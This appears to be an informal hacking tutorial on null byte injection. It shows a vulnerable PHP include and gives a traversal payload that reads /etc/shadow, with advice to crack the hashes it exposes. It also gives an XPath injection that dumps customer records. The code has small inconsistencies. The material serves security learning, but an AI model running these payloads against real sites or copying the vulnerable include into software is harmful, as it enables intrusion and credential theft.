Null Byte Poisoning

Prerequisites: 

Be able to type %00 and know the structure of the server file system.

So what is a Null Byte? It is not just some guy that hangs around the SoldierX web site and rambles on and on, putting his two cents in or adding tools to the site. No.. Null Byte is a null or empty character that can be used to terminate a string of code and allow the attacker to inject his own requests. This technique was founded in the late 1980's, a coincidence, nope.

The original injection flaw was found in cgi scripts that used the C, Perl and Python languages. Today, most other web scripting languages are based off of the old C style code that was used back then. For instance, PHP, is one of the major contributors to Null Byte injection attacks still today. Null bytes can be used for directory traversal attacks, executing queries to a database, and injecting code into an application. I will cover attacks on 2 different languages in this tutorial: PHP and Xpath. In each I will show basic examples of directory traversal and query injection.
Ok, i'm done rambling let's see what this injection looks like. It is very simple.

So we have a url that looks something like this:
http://vulnerable-site.com/script.php?doc=someotherfile.txt

The code behind this looks like so:
$doc = $_GET['file'];
require_once("/var/www/locationOfFile/$doc.txt");

So let's see, what's wrong with this script? Nothing, looks good to me right? Wrong!

This request can actually be manipulated/terminated by adding a null byte at the end, allowing us to retrieve any file on the system that we want. As I stated, the injection technique is very simple, yet very effective. It is performed like so:
http://vulnerable-site.com/script.php?doc=../../../../../../etc/shadow%00

This will dump the contents of the shadow file to the screen, and all we have to do is copy and paste the hashes into a new file for cracking. This technique can be used for any file located on the system. There are many other forms of null byte injection such as it's use with xpath injection.
This brings me to Xpath injection through the use of null bytes.
What is Xpath? XPath is an XML based query language that is used to select nodes from an xml file. This injection is a quite different from the directory traversal based attack as it is a query injection attack.
Let's take a look at what an xpath query looks like and the xml code that is rendered from the query.

XML Code:
<customers>
<username>
<name>Bob</name>
<password>SmithDog</password>
<addressLine1>123 Some Street</addressLine1>
<addressLin2>Las Vegas, NV</addressLine2>
<email>bsmith@gmail.com</email>
<CCardNumber>1234-5678-9012-3456</CCardNumber>
</username>
</customers>

As you can see, the XML file is pretty stright forward. Now for the query that retrieves it's data from the xml credentials file and creates a nice little well formed XML document for the user. The Xpath query issued to retrieve the users email information would be done through the following query that is a bit similar to a php sql query.
/customers/username[name='Bob' and password='SmithDog']/email

So how do we leverage this query? With a null byte of course! Here is the attack injection of this script, this is usually injected with a browser proxy tool such as burp suite.

/customers/username[name='Bob' and password=''+or+1=1]/password%00']/email

It is that simple. This query will dump all customers information from the target xml file. This looks quite similar to an sql injection doesn't it? That is because the injection attack is exactly the same only targeted towards Xpath.